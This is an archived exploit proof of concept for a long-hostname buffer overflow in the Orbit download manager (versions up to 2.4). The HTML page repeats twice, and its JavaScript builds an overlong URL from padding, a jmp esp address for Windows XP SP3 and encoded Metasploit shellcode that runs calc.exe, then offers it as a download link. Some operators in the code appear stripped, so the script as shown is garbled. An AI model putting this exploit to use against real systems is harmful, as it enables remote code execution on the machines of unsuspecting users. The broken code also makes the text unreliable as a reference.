<html>
<body>
Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc<br />
Vulnerability discovered by Secunia<br />
Exploit and POC provided by: JavaGuru<br />
<br />
Right click on link below then choose download by orbit, CALC.EXE will pop up<br />
<br />
I got a lot of problems when trying to execute shellcode, because a lot of chars<br />
was forbidden and I was not able to execute shellcode.<br />
After playing a little I found out the solution.<br />
<br />
Don't forget, open this HTML in Firefox
<br />
Check it out.<br />
<br />
Any questions/comments: JavaGuru1999@yahoo.de<br />
<br />
<script language="JavaScript">
var tmp = "http://";
for (i=0;i<508;i ) tmp ="o";
// jmp esp from kernel32.dll XP SP 3 English
//
tmp = "{F?|";
// some nops
tmp = "????";
// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp = "?YYYY?YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY?????7IIIIIIIIIIIIIIIIIQZjgXP0B1ABkBAw2BB2AA0AAXBP8BBum9IlKX74C030wpnksuUlnkalfePxTAJOlKboVxLKQOEpUQzK1Ynk6TLKS1jNEaO0Z9LlndIP44UWjaKzfm5QkrjKl4UkADDdvdsEZELKsoWTGqjK0flKtL0KlKSo7lGqZKnkwllK4AJKK9QLDdTDzc7AO0AtlKCpvPLEO00xfllK70dLlK0peLlmLKCX6hxkuYnkopNPUPUPUPNku8UlCoFQyfcPpVLIl8k3o0ak2pqxankhzBCCqxZ8kNmZvnpWiom7rCU10lpcvNperXPes0g";
// Filename (not important)
tmp = "/a.rar";
// Write link for download for orbit!
document.write ('<a href="' tmp '">Right click, then choose download with orbit</a>');
</script>
</body>
</html>
[2009-02-27]
<body>
Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc<br />
Vulnerability discovered by Secunia<br />
Exploit and POC provided by: JavaGuru<br />
<br />
Right click on link below then choose download by orbit, CALC.EXE will pop up<br />
<br />
I got a lot of problems when trying to execute shellcode, because a lot of chars<br />
was forbidden and I was not able to execute shellcode.<br />
After playing a little I found out the solution.<br />
<br />
Don't forget, open this HTML in Firefox
<br />
Check it out.<br />
<br />
Any questions/comments: JavaGuru1999@yahoo.de<br />
<br />
<script language="JavaScript">
var tmp = "http://";
for (i=0;i<508;i ) tmp ="o";
// jmp esp from kernel32.dll XP SP 3 English
//
tmp = "{F?|";
// some nops
tmp = "????";
// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp = "?YYYY?YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY?????7IIIIIIIIIIIIIIIIIQZjgXP0B1ABkBAw2BB2AA0AAXBP8BBum9IlKX74C030wpnksuUlnkalfePxTAJOlKboVxLKQOEpUQzK1Ynk6TLKS1jNEaO0Z9LlndIP44UWjaKzfm5QkrjKl4UkADDdvdsEZELKsoWTGqjK0flKtL0KlKSo7lGqZKnkwllK4AJKK9QLDdTDzc7AO0AtlKCpvPLEO00xfllK70dLlK0peLlmLKCX6hxkuYnkopNPUPUPUPNku8UlCoFQyfcPpVLIl8k3o0ak2pqxankhzBCCqxZ8kNmZvnpWiom7rCU10lpcvNperXPes0g";
// Filename (not important)
tmp = "/a.rar";
// Write link for download for orbit!
document.write ('<a href="' tmp '">Right click, then choose download with orbit</a>');
</script>
</body>
</html>
[2009-02-27]